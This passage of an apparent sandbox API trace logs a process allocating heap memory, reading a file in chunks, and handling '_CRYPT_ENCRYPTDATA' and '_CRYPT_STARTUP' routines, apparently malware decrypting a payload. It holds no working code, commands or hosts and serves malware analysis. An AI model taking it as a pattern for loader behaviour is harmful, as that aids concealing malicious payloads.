lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0202.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0202.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0202.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0202.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0202.711] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0202.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0202.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0202.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0202.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0202.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf61020 [0202.713] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.738] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.740] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.742] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.744] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.747] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.749] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.751] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.753] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.756] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.758] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0202.761] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x81d0, lpOverlapped=0x0) returned 1 [0202.762] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0202.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0202.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0202.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0202.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0202.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d0) returned 0x1079020 [0202.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf61020 | out: hHeap=0x970000) returned 1 [0202.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0202.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0202.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0202.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0202.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0202.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0202.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0202.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d0) returned 0xe5c020 [0202.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1079020 | out: hHeap=0x970000) returned 1 [0202.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0202.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0202.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0202.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0202.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0202.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d0) returned 0xf23020 [0202.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0202.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf23020 | out: hHeap=0x970000) returned 1 [0202.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0202.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0202.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0202.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0202.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0202.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0202.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0202.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0202.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0202.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0202.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0202.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0202.845] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0202.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0202.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0202.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0202.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0202.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0202.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0202.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0202.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0202.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d0) returned 0xf2a020 [0202.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0202.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0202.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0202.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0202.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0202.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d58 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0202.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb81d0) returned 0xffd020 [0202.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0202.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0202.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0202.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0202.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0202.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0202.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0202.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0202.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0202.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0202.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0202.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0202.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0202.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0202.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0202.995] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0202.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0202.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0202.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0202.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0202.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0202.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0202.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0202.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0202.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0202.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0202.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0202.997] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0202.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0202.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0202.997] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0202.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0203.003] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0203.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0203.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0203.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0203.003] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0203.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0203.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0203.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0203.004] 